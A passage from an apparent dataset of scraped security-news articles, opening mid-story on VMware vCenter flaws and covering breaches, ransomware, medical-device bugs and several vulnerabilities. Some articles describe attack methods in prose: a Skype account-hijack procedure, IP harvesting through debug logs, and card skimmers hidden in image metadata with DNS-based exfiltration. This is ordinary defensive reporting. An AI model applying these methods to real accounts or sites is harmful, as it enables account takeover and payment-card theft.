to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,"" VMware said in its advisory. VMware vCenter Server is a server management utility that's used to control virtual machines, ESXi hosts, and other dependent components from a single centralized location. The flaw affects vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x. VMware credited Ricter Z of 360 Noah Lab for reporting the vulnerability. The patch release also rectifies an authentication issue in the vSphere Client that affects Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins (CVE-2021-21986, CVSS score: 6.5), thereby allowing an attacker to carry out actions permitted by the plug-ins without any authentication. While VMware is strongly recommending customers to apply the ""emergency change,"" the company has published a workaround to set the plug-ins as incompatible. ""Disablement of these plug-ins will result in a loss of management and monitoring capabilities provided by the plug-ins,"" the company noted. ""Organizations who have placed their vCenter Servers on networks that are directly accessible from the Internet [...] should audit their systems for compromise,"" VMware added. ""They should also take steps to implement more perimeter security controls (firewalls, ACLs, etc.) on the management interfaces of their infrastructure."" CVE-2021-21985 is the second critical vulnerability that VMware has rectified in the vCenter Server. Earlier this February, it resolved a remote code execution vulnerability in a vCenter Server plug-in (CVE-2021-21972) that could be abused to run commands with unrestricted privileges on the underlying operating system hosting the server. The fixes for the vCenter flaws also come after the company patched another critical remote code execution bug in VMware vRealize Business for Cloud (CVE-2021-21984, CVSS score: 9.8) due to an unauthorized endpoint that could be exploited by a malicious actor with network access to run arbitrary code on the appliance. Previously, VMware had rolled out updates to remediate multiple flaws in VMware Carbon Black Cloud Workload and vRealize Operations Manager solutions. ",Vulnerability Adobe releases open source malware classification tool,https://thehackernews.com/2012/04/adobe-releases-open-source-malware.html,"Adobe releases open source malware classification tool Adobe Systems has released a malware classification tool in order to help security incident first responders, malware analysts and security researchers more easily identify malicious binary files. The 'Adobe Malware Classifier' tool uses machine learning algorithms to classify Windows executable and dynamic link library (DLL) files as clean, malicious or unknown, Adobe security engineer Karthik Raman said in a recent blog post, Raman originally developed Malware Classifier for in-house use by Adobe's Product Security Incident Response (PSIRT) Team. When run, the tool extracts seven key attributes from every analyzed binary file and compares them to data obtained by running the J48, J48 Graft, PART, and Ridor machine-learning algorithms on a set of 100,000 malicious programs and 16,000 clean ones, Raman said. ""Malware classification can be a difficult task for even experienced analysts, especially in the modern era of highly obfuscated code, binaries that are designed to evade scanners and anti-malware applications. Determining whether an odd binary is potentially malicious can be a frustrating and time-consuming task"". It is available for download from SourceForge. ",Malware Hackers Can Remotely Access Syringe Infusion Pumps to Deliver Fatal Overdoses,https://thehackernews.com/2017/09/hacking-infusion-pumps.html,"Internet-of-things are turning every industry into the computer industry, making customers think that their lives would be much easier with smart devices. However, such devices could potentially be compromised by hackers. There are, of course, some really good reasons to connect certain devices to the Internet. But does everything need to be connected? Of course, not—especially when it comes to medical devices. Medical devices are increasingly found vulnerable to hacking. Earlier this month, the US Food and Drug Administration (FDA) recalled 465,000 pacemakers after they were found vulnerable to hackers. Now, it turns out that a syringe infusion pump used in acute care settings could be remotely accessed and manipulated by hackers to impact the intended operation of the device, ICS-CERT warned in an advisory issued on Thursday. An independent security researcher has discovered not just one or two, but eight security vulnerabilities in the Medfusion 4000 Wireless Syringe Infusion Pump, which is manufactured by Minnesota-based speciality medical device maker Smiths Medical. The devices are used across the world for delivering small doses of medication in acute critical care, such as neonatal and pediatric intensive care and the operating room. Some of these vulnerabilities discovered by Scott Gayou are high in severity that can easily be exploited by a remote attacker to ""gain unauthorized access and impact the intended operation of the pump."" According to the ICS-CERT, ""Despite the segmented design, it may be possible for an attacker to compromise the communications module and the therapeutic module of the pump."" The most critical vulnerability (CVE-2017-12725) has been given a CVSS score of 9.8 and is related to the use of hard-coded usernames and passwords to automatically establish a wireless connection if the default configuration is not changed. The high-severity flaws include: A buffer overflow bug (CVE-2017-12718) that could be exploited for remote code execution on the target device in certain conditions. Lack of authentication (CVE-2017-12720) if the pump is configured to allow FTP connections. Presence of hard-coded credentials (CVE-2017-12724) for the pump's FTP server. Lack of proper host certificate validation (CVE-2017-12721), leaving the pump vulnerable to man-in-the-middle (MitM) attacks. The remaining are medium severity flaws which could be exploited by attackers to crash the communications and operational modules of the device, authenticate to telnet using hard-coded credentials, and obtain passwords from configuration files. These vulnerabilities impact devices that are running versions 1.1, 1.5 and 1.6 of the firmware, and Smiths Medical has planned to release a new product version 1.6.1 in January 2018 to address these issues. But in the meantime, healthcare organizations are recommended to apply some defensive measures including assigning static IP addresses to pumps, monitoring network activity for malicious servers, installing the pump on isolated networks, setting strong passwords, and regularly creating backups until patches are released. ",Vulnerability Equifax Data Breach: Steps You should Take to Protect Yourself,https://thehackernews.com/2017/09/equifax-data-breach.html,"Equifax has suffered one of the largest data breaches in history that has left highly sensitive data of as many as 143 million people—that's nearly half of the US population—in the hands of hackers. Based on the company's investigation, some unknown hackers managed to exploit a security flaw on the Equifax website and gained unauthorized access to certain files between mid-May and July 2017. The information accessed primarily include full names, birth dates, Social Security numbers, addresses and, in some cases, driver's license numbers—most of the information that's banks, insurance companies, and other businesses use to confirm a consumer identity. The company added that 209,000 credit card numbers were also obtained by the attackers, along with ""certain dispute documents with personal identifying information for approximately 182,000 U.S. consumers."" Equifax is one of the three major organizations in the United States that calculates credit scores, which means the company has access to an extraordinary amount of personal and financial information for virtually all American adults. Here's How Roughly Equifax Handled the Massive Data Breach For a second, keep aside the scope and severity of the data breach, and let's talk about the how Equifax handled the breach after discovering it and what all it did for its customers. First of all, the third largest U.S. credit reporting firm took over five weeks to publically disclose the data breach, which began in mid-May that means the data of 143 million people were exposed for over 3 months. What's more? Reportedly, three senior Equifax executives, namely John Gamble (CFO), Joseph Loughran and Rodolfo Ploder, were permitted to sell almost $2 million worth of their shares just days after the company learned of this massive hack. However, the company officials told Bloomberg that the employees were unaware of the data breach at the time of the sale. Wait there's even more: After revealing the data breach on Thursday, Equifax did not contact everyone who was affected, rather it asked customers to go to its special website to figure out whether they were affected by entering the last 6 digits of their SSN and last name. But it's not that simple. The website is not giving a clear answer about whether or not your data may have been affected, but making it clear to those who were not exposed. It's confusing. What Would Be Hackers Next Move? With this data in hand, it's most likely that hackers are already selling your personal information on the dark web or attempting to extort the company, like cyber criminals do in most massive data breach cases. The Game of Thrones hackers did the same by leaking upcoming episodes of the widely watched show after HBO refused to their $6 Million ransom demand for the 1.5 terabytes of data they claimed to have stolen from the company. Same happened to Netflix in April this year when the company refused to meet 50 Bitcoins ransom demand of a hacking group calling itself The Dark Overlord, which then leaked 10 back-to-back episodes of the Season 5 premiere of Netflix's ""Orange Is the New Black."" Although Equifax has not yet confirmed whether the hackers have contacted the company for any demand or not, the breach is major, and all 143 Million Americans quickly need to take action to protect themselves and their loved ones. Here's what all you can do to Protect Yourself: 1. Enroll in TrustedID Premier Equifax is offering a year of free credit monitoring and identity theft protection program for free for one year through TrustedID Premier that you should sign up if you are a US resident—the service is free whether or not you have been affected by the breach. The program offers services such as Equifax credit report, 3 bureau credit file monitoring, Equifax credit report lock, Social Security number monitoring and up to $1M identity theft insurance. However, Equifax's own identity protection service is not enough, you must follow below steps to help ensure you're doing everything to protect your identity. 2. Monitor your accounts In upcoming days, the personal and payment cards details are likely to be sold in underground black markets, resulting in financial loss and identity theft to millions of customers. So, users are advised to be vigilant in reviewing their bank account statements, checking for any changes in their personal information and reporting any unauthorized transactions to the respective bank. 3. Freeze Your Credit Report Since your stolen Social Security number can be misused by hackers to open new accounts in your name or ruin your credit score, you should consider placing a credit freeze request. Freezing your credit will make it difficult for anyone to open a new account in your name, as you (or anyone masquerading as you) will need the PIN that you got when you froze your credit to unfreeze your account. To freeze your credit, contact these credit bureaus: Equifax: 1-800-349-9960, Experian: 1‑888‑397‑3742, and TransUnion: 1-888-909-8872. 4. Change your Passwords and Logins Meanwhile, all customers are advised to reset their account passwords and login information on the website. 5. Watch out for tax season It's important for you to know that identity thieves can use your stolen social security number to file fraudulent tax returns and get refunds. So, you should consider filing your taxes early. 6. Watch Out for Scams Users are strongly advised to be cautious if they receive any suspicious or unrecognised phone call, text message, or email from anyone saying you must pay taxes or a debt immediately—even if they provide your personal information. 7. Already Experienced Identity Theft? Here's what to do now: If you have already a victim to the identity theft, visit the FTC Identity Theft Recovery website and fill in the form. The Federal Trade Commission will provide you with a specific identity theft report and ""to-do"" recovery plans. ",Data_Breaches Ukraine Police Warns of New NotPetya-Style Large Scale CyberAttack,https://thehackernews.com/2017/10/ukraine-notpetya-cyberattack.html,"Remember NotPetya? The Ransomware that shut down thousands of businesses, organisations and banks in Ukraine as well as different parts of Europe in June this year. Now, Ukrainian government authorities are once again warning its citizens to brace themselves for next wave of ""large-scale"" NotPetya-like cyber attack. According to a press release published Thursday by the Secret Service of Ukraine (SBU), the next major cyber attack could take place between October 13 and 17 when Ukraine celebrates Defender of Ukraine Day (in Ukrainian: День захисника України, Den' zakhysnyka Ukrayiny). Authorities warn the cyber attack can once again be conducted through a malicious software update against state government institutions and private companies. The attackers of the NotPetya ransomware also used the same tactic—compromising the update mechanism for Ukrainian financial software provider called MeDoc and swapping in a dodgy update including the NotPetya computer virus. The virus then knocked computers in Ukrainian government agencies and businesses offline before spreading rapidly via corporate networks of multinational companies with operations or suppliers in eastern Europe. Presentation by Alexander Adamov, CEO at NioGuard Security Lab The country blamed Russia for the NotPetya attacks, while Russia denied any involvement. Not just ransomware and wiper malware, Ukraine has previously been a victim of power grid attacks that knocked its residents out of electricity for hours on two different occasions. The latest warning by the Ukrainian secret service told government and businesses to make sure their computers and networks were protected against any intrusion. ""SBU notifies about preparing for a new wave of large-scale attack against the state institutions and private companies. The basic aim—to violate normal operation of information systems, that may destabilize the situation in the country,"" the press release reads. ""The SBU experts received data that the attack can be conducted with the use of software updating, including public applied software. The mechanism of its realization will be similar to cyber-attack of June 2017."" To protect themselves against the next large-scale cyber attack, the SBU advised businesses to follow some recommendations, which includes: Updating signatures of virus protection software on the server and in the workstation computers. Conducting redundancy of information, which is processed on the computer equipment. Providing daily updating of system software, including Windows operating system of all versions. Since the supply chain attacks are not easy to detect and prevent, users are strongly advised to keep regular backups of their important files on a separate drive or storage that are only temporarily connected for worst case scenarios. Most importantly, always keep a good antivirus on your system that can detect and block any malware intrusion before it can infect your device, and keep it up-to-date for latest infection-detection. ",Cyber_Attack LockerPin Ransomware Resets PIN and Permanently Locks Your SmartPhones,https://thehackernews.com/2015/09/android-lock-ransomware.html,"Your device's lock screen PIN is believed to keep your phone's contents safe from others, but sadly not from a new piece of ransomware that is capable of hijacking safety of your Android devices. A group of security researchers has uncovered what is believed to be the first real example of malware that is capable to reset the PIN code on a device and permanently lock the owner out of their own smartphone or tablet. This Android PIN-locking ransomware, identified as Android/Lockerpin.A, changes the infected device's lock screen PIN code and leaves victims with a locked mobile screen, demanding for a $500 (€450) ransom. Here's the Kicker: Since the lock screen PIN is reset randomly, so even paying the ransom amount won't give you back your device access, because even the attackers don't know the changed PIN code of your device, security researchers at Bratislava-based antivirus firm ESET warn. LockerPIN, as dubbed by the researchers, being spread through an adult entertainment apps installed from third-party websites, warez forums, and torrents – outside of the official Google Play Store. The app in question is Porn Droid, which is the second of its kind observed recently called Adult Player – another porn-themed Android app that takes selfies of its users and include them in its ransom messages. How LockerPIN Works? Once installed on the victim's smartphone, the app first tricks users into granting it device administrator rights. It does so by disguising itself as an ""Update patch installation"" window. After gaining admin privileges, the malicious app goes on to change the user's lock screen PIN code, using a randomly generated number. This random number is not even sent to the attacker, meaning even after victims pay the ransom; nobody can unlock the device's screen. Though the majority of infected devices are detected within the United States, the researchers have spotted the infections worldwide. How to Get Rid of this LockerPIN Ransomware? Unfortunately, there is ""no effective way"" to regain access to infected devices without losing personal data. Rebooting the device in Safe Mode and uninstalling the offending application or using Android Debug Bridge (ADB) alone won't solve the issue. The only way to unlock the device and get rid of LockerPIN ransomware app is to perform a factory reset that would wipe out all the personal data and apps stored on your device. Ransomware delivering through malicious apps are growing increasingly and becoming more sophisticated with time, and this newly discovered LockerPIN Ransomware proves the theory. The bottom line: To avoid falling victims to malicious apps like Porn Droid and Adult Player, the saving grace for users is: Don't install apps outside of the Google Play Store. Don't grant administrator privileges to apps unless you truly trust them. ",Malware How Some Chinese Hackers Started Making Big Money,https://thehackernews.com/2015/10/hacking-news-china.html,"We know that Hackers hack for a variety of reasons: ...some hack to test their skills, …some hack to gain recognition, ...some hack to make money, ...some hack to support their Nation-State strategy, ...and, some hack alone, and some hack in Groups. And Chinese Hackers are the ones who are infamous for their dedication towards Hacking. Chinese hacking groups are better known for attacking and stealing information, organized cyber crimes, theft of intellectual property and state-sponsored cyber espionage attacks. But it seems that several Chinese hacker groups have now shifted their motive of hacking towards 'making money'. How much Money Hackers Actually Make? It is a known fact that hacking makes money, but how much? Answer: At least $4,500,000/year from one malware campaign. How? We often observe mobile and desktop applications bundled with Ad-displaying programs, called Adware, to generate revenue. Just last week we reported about ""Kemoge Android Adware,"" disguising itself as popular apps, is making the rounds in as many as 20 countries. Kemoge malware, whose origin is suspected from China, can root vulnerable Android devices, which practically allows hackers to take over victim's Android device. Once installed, the malware automatically download other Apps it gets paid to promote. But Kemoge adware is not alone, the researchers have discovered some it's variants that belong to the same malware family. Chinese Adware Family Threatening your Android In a recent blog post, Security experts at Cheetah Mobile company, developers of CM Security and Antivirus apps, detailed about how Chinese hackers are making millions of profits from underground App distribution chains. Other members of the same family are: Ghost Push Braintest Guaranteed Clicks RetroTetri All these malware under same illegal Mobile Marketing Industry Chain follow a similar modus operandi; which is: Repackage popular apps to injected malicious code and Ad components Bypass Google Play Store's Bouncer Security Exploiting existing Android vulnerabilities to gain Admin-level permissions Root users' devices that make them unable to uninstall the virus And then promote malicious apps through legitimate channels ""As users are completely unable to uninstall these malicious apps, the virus developers soon get a massive number of active users."" Cheetah Mobile researcher said. ""With this user base, the virus developer is able to set up a marketing promotion company and become a mobile dealer. Then they have the qualifications to cooperate with ad sponsors, making money by distributing products for advertisers."" These malicious apps were found on some famous App Stores, including Google Play, Aptoide and Mobogonie. Some Critical Findings from their Research are: This Virus family includes 4000 Samples The Adware is affecting Android versions from 2.3 to 5.1. More than 10,000 phone types and 2,742 brands have been affected. The virus has affected more than 900,000 Android users in over 116 countries, especially Southeast Asia. More than four suspicious domain names have been identified. Tips for keeping your Android Device Safe Users are advised to: never click on suspicious links from emails or websites, be careful what you download, don't install apps without reviewing them, inspect each and every permission an Android app asks for, keep your Android device updated. Read More: China Admits It Has Army of Hackers China arrested Hackers at U.S. Government Request China Using A Powerful 'Great Cannon' Weapon to Censor The Internet China Demands Tech Companies to give them Backdoor and Encryption Keys To grab more of what China-based hacks and attacks are capable of, Follow us and Stay Tuned. ",Malware DarkSide Ransomware Gang Extorted $90 Million from Several Victims in 9 Months,https://thehackernews.com/2021/05/darkside-ransomware-gang-extorted-90.html,"DarkSide, the hacker group behind the Colonial Pipeline ransomware attack earlier this month, received $90 million in bitcoin payments following a nine-month ransomware spree, making it one of the most profitable cybercrime groups. ""In total, just over $90 million in bitcoin ransom payments were made to DarkSide, originating from 47 distinct wallets,"" blockchain analytics firm Elliptic said. ""According to DarkTracer, 99 organisations have been infected with the DarkSide malware - suggesting that approximately 47% of victims paid a ransom, and that the average payment was $1.9 million."" Of the total $90 million haul, the DarkSide's developer is said to have received $15.5 million in bitcoins, while the remaining $74.7 million was split among its various affiliates. FireEye's research into DarkSide's affiliate program had previously revealed that its creators take a 25% cut for payments under $500,000 and 10% for ransoms above $5 million, with the lion's share of the money going to the recruited partners. Elliptic co-founder and chief scientist Dr. Tom Robinson said the ""split of the ransom payment is very clear to see on the blockchain, with the different shares going to separate Bitcoin wallets controlled by the affiliate and developer."" What's more, an analysis of blockchain transactions uncovered the syndicate had made $17.5 million in the past three months alone, with roughly 10% of the profits coming from payouts made by chemical distribution company Brenntag (nearly $4.4 million) and Colonial Pipeline. The Georgia-headquartered firm said it paid 75 bitcoins ($4.4 million as of May 8) to restore access, CEO Joseph Blount told the Wall Street Journal. DarkSide, which went operational in August 2020, is just one of many groups that operated as a service provider for other threat actors, or ""affiliates,"" who used its ransomware to extort targets in exchange for a cut of the profits, but not before threatening to release the data — a tactic known as double extortion. But in a sudden turn of events, the prolific cybercrime cartel last week announced plans to wind up its Ransomware-as-a-Service (RaaS) affiliate program for good, claiming that its servers had been seized by law enforcement. Its bitcoin wallet was also emptied to an unknown account. The fallout from the biggest known cyberattack on U.S. energy industry is only the latest example of how a spate of ransomware incidents are increasingly affecting the operations of critical infrastructure and emerging a national security threat. The events have also turned the spotlight on implementing necessary strategies to ensure vital functions remain operational in the event of a significant cyber disruption. ",Malware Security hole allows anyone to hijack your Skype account,https://thehackernews.com/2012/11/security-hole-allows-anyone-to-hijack.html,"It looks like Skype has another big hole in their security. According to reports, a security hole makes Skype accounts vulnerable to hijacking. The security hole allows unauthorized users with knowledge of your Skype-connected email address to change the password on your Skype account, thus gaining control of it. The hijack is triggered by signing up for a new Skype account using the email address of another registered user. No access to the victim's inbox is required one just simply needs to know the address. Creating an account this way generates a warning that the email address is already associated with another user, but crucially the voice-chat website does not prevent the opening of the new account. Then hacker just have to ask for a password reset token , which Skype app will send automatically to your email, this allows a third party to redeem it and claim ownership of your original username and thus account. The issue was reportedly documented on Russian forums months ago, and appears to have been easy to exploit. Skype appears to have pulled its password reset page, stopping this flaw in its tracks and said, ""We have had reports of a new security vulnerability issue. As a precautionary step we have temporarily disabled password reset as we continue to investigate the issue further. We apologize for the inconvenience but user experience and safety is our first priority"" For quick security of your account, users should change associated e-mail address of your Skype account. ",Vulnerability Vulnerable Texas Transportation Site 'TxTag' leaves 1.2 Million Credit Cards at Risk,https://thehackernews.com/2014/04/vulnerable-texas-transportation-site.html,"Do you know, Why another major company is getting hacked every week? Because of poor policies, Laziness to Incident Response and lack in will-power to put efforts on applying important patches. Some companies are not taking their security more seriously, and best suitable example for this is TxTag, an electronic toll collection systems in Texas operated by Texas Department of Transportation (TxDOT). 1.2 MILLION CREDIT CARD ARE AT RISK Security researcher, David Longenecker claimed a serious flaw at TxTag website that exposes the active Credit Card Details and Personal Information of 1.2 Million Drivers including active TxTags (vehicle stickers with microchips, which are scanned by electronic readers on toll roads), Names, phone numbers, full residence addresses, email addresses, along with their complete Credit card numbers and Expiration date. According to David, the account names could be easily predictable by anyone, which is typically an 8-digit number that begins with the number 2 and protected by only a 4-digit PIN Number, that could be itself another easy x-factor to abuse. But their stupidity didn't end here, to make the case worst for their users; TxTag.org inexplicably stores the entire credit card details including Credit Card Numbers and expiration date, which meant to be partial visible to users, but available in the plaintext as the value of input field on the page source code. ""I have no indication credit cards have actually been stolen. I merely found and reported a flaw that could very easily be exploited to obtain this information."" he said. NO LESSONS LEARNED FROM PREVIOUS CYBER ATTACK Texas Department of Transportation had not learned any lesson from their past experiences with hackers. Exactly two years back, they themselves confirmed a ""cyber attack"" in which the hackers overloaded the TxTag back office accounts servers, but according to TxTag, no accounts were compromised at the time. In the reply back in 2012, Karen Amacker, TxDOT spokesman said, ""Customer service and information security are of paramount importance to TxDOT. Cyberattackers recently tried to get into TxTag.org, but were not successful. All of our customers' information, including credit card information, remains secure."" But this security and so called paramount importance is seems to be a dilemma for them as they did nothing to improve the data security of their users after facing an attack. FLAW REPORTED, BUT YET NO RESPONSE The Flaw has been reported by the researcher, but neither TxTag nor TxDOT have so far responded to any of his request for comment. ""The problem lies in the AutoPay Method screen. If you do not have a credit card or bank account stored for automatic payments, then financial data cannot be stolen through this manner."" david said. We should understand that no one is safe when bad hackers are out to do some damage. You are always advised to don't be lazy with your passwords, set tough-to-guess and long passwords and don't store information online that you don't absolutely need to. Stay Tuned, Stay Safe. ",Data_Breaches Android Clickjacking Rootkit Demonstrated,https://thehackernews.com/2012/07/android-clickjacking-rootkit.html,"Android Clickjacking Rootkit Demonstrated Mobile security researchers have identified an aspect of Android 4.0.4 (Ice Cream Sandwich) and earlier models that clickjacking rootkits could exploit. Researchers at NC State in the US have developed a proof-of-concept prototype rootkit that attacks the Android framework and could be used to steal personal information. What is clickjacking? It is a malicious technique that tricks users and is often used to take over computers, web cams, or snag confidential info that is revealed by users who thinks they are on an innocent webpage. Like most Android malware, the rootkit can be distributed as a malicious app, opening up a host of potential vulnerabilities on any device on which it is installed. However, it functions in a different way. The rootkit, which could be bundled with an app and is said to be undetectable by anti-virus packages, would allow an attacker to replace a smartphone's browser with a version that logs key strokes to capture bank card data and uploads them to a hacker-controlled website. Jiang explained in a video in which he demonstrates the rootkit in action: In a demonstration video, the rootkit is shown manipulating the apps on a smartphone. Such a program could be used by cybercriminals to replace an app with a malicious data stealing version that appears legitimate to the user. ""This would be a more sophisticated type of attack than we've seen before,"" says Jiang, ""But there is good news. Now that we've identified the problem, we can begin working on ways to protect against attacks like these."" ",Malware How One Photo Could Have Hacked Your WhatsApp and Telegram Accounts,https://thehackernews.com/2017/03/hack-whatsapp-telegram-account.html,"Next time when someone sends you a photo of a cute cat or a hot chick on WhatsApp or Telegram then be careful before you click on the image to view — it might hack your account within seconds. A new security vulnerability has recently been patched by two popular end-to-end encrypted messaging services — WhatsApp and Telegram — that could have allowed hackers to completely take over user account just by having a user simply click on a picture. The hack only affected the browser-based versions of WhatsApp and Telegram, so users relying on the mobile apps are not vulnerable to the attack. According to Checkpoint security researchers, the vulnerability resided in the way both messaging services process images and multimedia files without verifying that they might have hidden malicious code inside. For exploiting the flaw, all an attacker needed to do was sending the malicious code hidden within an innocent-looking image. Once the victim clicked on the picture, the attacker could have gained full access to the victim's WhatsApp or Telegram storage data. This eventually allowed attackers to take full access to the user's account on any browser, view and manipulate chat sessions, access victim's personal and group chats, photos, videos, audios, other shared files and contact lists as well. Millions of WhatsApp and Telegram accounts could have been hacked using just a PHOTO! CLICK TO TWEET To make this attack widespread, the attacker can then send the malware-laden image to everyone on the victim's contact list, which could, eventually, mean that one hijacked account could be led to countless compromises by leapfrogging accounts. Video Demonstration The researchers also provided a video demonstration, given below which shows the attack in action. Here's Why This Vulnerability Went Undetected: Both WhatsApp and Telegram use end-to-end encryption for its messages to ensure that nobody, except the sender and the receiver, can read the messages in between. However, this same end-to-end encryption security measure was also the source of this vulnerability. Since the messages were encrypted on the side of the sender, WhatsApp and Telegram had no idea or a way of knowing, that malicious code was being sent to the receiver, and thus were unable to prevent the content from being running. ""Since messages were encrypted without being validated first, WhatsApp and Telegram were blind to the content, thus making them unable to prevent malicious content from being sent,"" the researchers writes in a blog post. WhatsApp fixed the flaw within 24 hours on Thursday, March 8, while Telegram patched the issue on Monday. Since the fixes have been applied on the server end, users don't have to update any app to protect themselves from the attack; instead, they just need a browser restart. ""It's a big vulnerability in a significant service,"" said Oded Vanunu, head of product vulnerability research at Check Point. ""Thankfully, WhatsApp and Telegram responded quickly and responsibly to deploy the mitigation against exploitation of this issue in all web clients."" WhatsApp did not notice any abuse of the vulnerability, while Telegram claimed the flaw was less severe than WhatsApp, as it required the victim to right click on the image content and then open it in a new window or tab for the malicious code to run and exploit its users. After fixing this flaw, content on the web versions of both WhatsApp and Telegram will now be validated before the end-to-end encryption comes into play, allowing malicious files to be blocked. ",Vulnerability Cybercrime Group Asking Insiders for Help in Planting Ransomware,https://thehackernews.com/2021/08/cybercrime-group-asking-insiders-for.html,"A Nigerian threat actor has been observed attempting to recruit employees by offering them to pay $1 million in bitcoins to deploy Black Kingdom ransomware on companies' networks as part of an insider threat scheme. ""The sender tells the employee that if they're able to deploy ransomware on a company computer or Windows server, then they would be paid $1 million in bitcoin, or 40% of the presumed $2.5 million ransom,"" Abnormal Security said in a report published Thursday. ""The employee is told they can launch the ransomware physically or remotely. The sender provided two methods to contact them if the employee is interested—an Outlook email account and a Telegram username."" Black Kingdom, also known as DemonWare and DEMON, attracted attention earlier this March when threat actors were found exploiting ProxyLogon flaws impacting Microsoft Exchange Servers to infect unpatched systems with the ransomware strain. Abnormal Security, which detected and blocked the phishing emails on August 12, responded to the solicitation attempt by creating a fictitious persona and reached out to the actor on Telegram messenger, only to have the individual inadvertently spill the attack's modus operandi, which included two links for an executable ransomware payload that the ""employee"" could download from WeTransfer or Mega.nz. ""The actor also instructed us to dispose of the .EXE file and delete it from the recycle bin. Based on the actor's responses, it seems clear that he 1) expects an employee to have physical access to a server, and 2) he's not very familiar with digital forensics or incident response investigations,"" said Crane Hassold, director of threat intelligence at Abnormal Security. Besides taking a flexible approach to their ransom demands, the plan is believed to have been concocted by the chief executive of a Lagos-based social networking startup, with the goal of using the siphoned funds to ""build my own company."" In one of the conversations that took place over the course of five days, the individual even took to calling himself ""the next Mark Zuckerberg."" Also of particular note is the method of using LinkedIn to collect corporate email addresses of senior-level executives, once again highlighting how business email compromise (BEC) attacks originating from Nigeria continue to evolve and expose businesses to sophisticated attacks like ransomware. ""There's always been a blurry line between cyberattacks and social engineering, and this is an example of how the two are intertwined. As people become better at recognizing and avoiding phishing, it should be no surprise to see attackers adopt new tactics to accomplish their goals,"" Tim Erlin, vice president of product management and strategy at Tripwire, said. ""The idea of a disgruntled insider as a cybersecurity threat isn't new. As long as organizations require employees, there will always be some insider risk. The promise of getting a share of the ransom might seem attractive, but there's almost zero guarantee that this kind of complicity will actually be rewarded, and it's highly likely that someone taking this attacker up on their offer would get caught,"" Erlin added. ",Malware e-Commerce Site Hackers Now Hiding Credit Card Stealer Inside Image Metadata,https://thehackernews.com/2020/06/image-credit-card-skimmers.html,"In what's one of the most innovative hacking campaigns, cybercrime gangs are now hiding malicious code implants in the metadata of image files to covertly steal payment card information entered by visitors on the hacked websites. ""We found skimming code hidden within the metadata of an image file (a form of steganography) and surreptitiously loaded by compromised online stores,"" Malwarebytes researchers said last week. ""This scheme would not be complete without yet another interesting variation to exfiltrate stolen credit card data. Once again, criminals used the disguise of an image file to collect their loot."" The evolving tactic of the operation, widely known as web skimming or a Magecart attack, comes as bad actors are finding different ways to inject JavaScript scripts, including misconfigured AWS S3 data storage buckets and exploiting content security policy to transmit data to a Google Analytics account under their control. Using Steganography to Hide Skimmer Code in EXIF Banking on the growing trend of online shopping, these attacks typically work by inserting malicious code into a compromised site, which surreptitiously harvests and sends user-entered data to a cybercriminal's server, thus giving them access to shoppers' payment information. In this week-old campaign, the cybersecurity firm found that the skimmer was not only discovered on an online store running the WooCommerce WordPress plugin but was contained in the EXIF (short for Exchangeable Image File Format) metadata for a suspicious domain's (cddn.site) favicon image. Every image comes embedded with information about the image itself, such as the camera manufacturer and model, date and time the photo was taken, the location, resolution, and camera settings, among other details. Using this EXIF data, the hackers executed a piece of JavaScript that was concealed in the ""Copyright"" field of the favicon image. ""As with other skimmers, this one also grabs the content of the input fields where online shoppers are entering their name, billing address, and credit card details,"" the researchers said. Aside from encoding the captured information using the Base64 format and reversing the output string, the stolen data is transmitted in the form of an image file to conceal the exfiltration process. Stating the operation might be the handiwork of Magecart Group 9, Malwarebytes added the JavaScript code for the skimmer is obfuscated using the WiseLoop PHP JS Obfuscator library. This is not the first time Magecart groups have used images as attack vectors to compromise e-commerce websites. Back in May, several hacked websites were observed loading a malicious favicon on their checkout pages and subsequently replacing the legitimate online payment forms with a fraudulent substitute that stole user card details. Abusing DNS Protocol to Exfiltrate Data from the Browser But data-stealing attacks don't have to be necessarily confined to malicious skimmer code. In a separate technique demonstrated by Jessie Li, it's possible to pilfer data from the browser by leveraging dns-prefetch, a latency-reducing method used to resolve DNS lookups on cross-origin domains before resources (e.g., files, links) are requested. Called ""browsertunnel,"" the open-source software consists of a server that decodes messages sent by the tool, and a client-side JavaScript library to encode and transmit the messages. The messages themselves are arbitrary strings encoded in a subdomain of the top domain being resolved by the browser. The tool then listens for DNS queries, collecting incoming messages, and decoding them to extract the relevant data. Put differently, 'browsertunnel' can be used to amass sensitive information as users carry out specific actions on a webpage and subsequently exfiltrate them to a server by disguising it as DNS traffic. ""DNS traffic does not appear in the browser's debugging tools, is not blocked by a page's Content Security Policy (CSP), and is often not inspected by corporate firewalls or proxies, making it an ideal medium for smuggling data in constrained scenarios,"" Li said. ",Cyber_Attack Skype Vulnerability Exposing User IP Addresses,https://thehackernews.com/2012/05/skype-vulnerability-exposing-user-ip.html,"Skype Vulnerability Exposing User IP Addresses Skype is warning users following the launch of a site devoted to harvesting user IP addresses.The Skype IP-Finder site allowed third-parties to see a user's last known IP address by simply typing in a user name. A script has been uploaded to Github that offers these options. According to the page, it can be used to lookup IP addresses of online Skype accounts, and return both the remote and the local IP of that account on a website. The script is for instance available on this site. Just enter the user name of a Skype user, fill out the captcha, and click the search button to initiate the lookup. You will receive the user's remote IP and port, as well as the local IP and port. Adrian Asher, director of product Security, Skype ""We are investigating reports of a new tool that captures a Skype user's last known IP address. This is an ongoing, industry-wide issue faced by all peer-to-peer software companies. We are committed to the safety and security of our customers and we are takings measures to help protect them."" The proof of concept is fairly simple. All an attacker needs to do is download a special Skype variant and alter a few registry keys to enable debug-log file creation.When adding a Skype contact, before sending the actual request, the victim's information card can be viewed. At this point, the log file records the user's IP address. The software, posted on Pastebin, works on a patched version of Skype 5.5 and involves adding a few registry keys that allow the attacker to check the IP address of users currently online. Services like Whois will then give some other details on the city, country, internet provider and/or the internal IP-address of the target. This particular flaw was discussed in a paper presented by an international team of researchers in November at the Internet Measurement Conference 2011 in Berlin. There is currently no way of protecting yourself against the lookup of the IP address, other than not logging in to Skype when the software is not needed. The only other option would be the use of a virtual private network or proxy to hide the IP address from users who look it up. ",Vulnerability Internet Explorer zero-day exploit targets U.S. nuke researchers,https://thehackernews.com/2013/05/internet-explorer-zero-day-exploit.html,"Security researchers revealed that series of ""Watering Hole"" has been conducted exploiting a IE8 zero-day vulnerability to target U.S. Government experts working on nuclear weapons research. The news is not surprising but it is very concerning, the principal targets of the attacks are various groups of research such as the components of U.S. Department of Labor and the U.S. Department of Energy, the news has been confirmed by principal security firms and by Microsoft corporate. 